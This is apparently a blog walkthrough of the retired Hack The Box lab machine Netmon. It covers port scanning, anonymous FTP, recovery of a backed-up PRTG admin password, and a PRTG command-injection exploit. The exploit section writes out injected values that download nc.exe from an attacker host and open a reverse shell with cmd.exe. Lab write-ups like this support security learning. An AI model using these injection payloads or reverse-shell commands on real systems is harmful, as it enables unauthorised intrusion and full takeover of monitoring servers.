This post documents the complete walkthrough of Netmon, a retired vulnerable VM created by mrb3n, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Netmon is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.152 --rate=700 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-03-10 13:41:15 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 49666/tcp on 10.10.10.152 Discovered open port 49664/tcp on 10.10.10.152 Discovered open port 49677/tcp on 10.10.10.152 Discovered open port 49667/tcp on 10.10.10.152 Discovered open port 49665/tcp on 10.10.10.152 Discovered open port 52337/tcp on 10.10.10.152 Discovered open port 5985/tcp on 10.10.10.152 Discovered open port 139/tcp on 10.10.10.152 Discovered open port 47001/tcp on 10.10.10.152 Discovered open port 80/tcp on 10.10.10.152 Discovered open port 445/tcp on 10.10.10.152 Discovered open port 49668/tcp on 10.10.10.152 Discovered open port 21/tcp on 10.10.10.152 Discovered open port 135/tcp on 10.10.10.152 Discovered open port 53099/tcp on 10.10.10.152

Whoa. masscan finds many open ports. Let’s do one better with nmap scanning the discovered ports to see what services are available.

# nmap -n -v -Pn -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677,52337,53099 -A --reason 10.10.10.152 -oN nmap.txt ... PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users |_02-25-19 11:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 80/tcp open http syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: PRTG/18.1.37.13946 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm |_http-trane-info: Problem with XML parsing of /evox/about 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 52337/tcp closed unknown reset ttl 127 53099/tcp closed unknown reset ttl 127 ... Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-10 13:48:31 |_ start_date: 2019-03-10 13:32:38

Since anonymous FTP login is allowed, let’s go with that first.

File Transfer Protocol

To my pleasant surprise, C:\Users\Public is available.

And guess what, user.txt is here!

PRTG Network Monitor

Moving on to the http service, this is how it looks like.

In conjunction with the official security advisory and the location of the various configuration files, I was able to uncover a plaintext password from the file below.

Here’s the plaintext password.

And since this is a backup and knowing administrators increment the year for convenience’s sake, the password may be [email protected] . Let’s give it a shot.

Awesome.

PRTG < 18.2.39 Command Injection Vulnerability

During my research for vulnerability related to PRTG, I chanced upon this blog discussing command injection vulnerability, with SYSTEM privileges no less.

Follow the instructions to create a custom notification with the following parameters.

test.txt; Invoke-WebRequest http://10.10.15.200/nc.exe -OutFile c:\Users\Public\Downloads

c.exe

If you’ve read the blog carefully, you’ll realize certain characters are encoded. As such, I’m avoiding certain bad characters, if you will, to download a copy of nc.exe to c:\Users\Public\Downloads with PowerShell.

Verify that nc.exe is indeed downloaded.

Next, we use the following parameters to run a reverse shell back to us.

test.txt; c:\Users\Public\Downloads

c.exe 10.10.15.200 1234 -e cmd.exe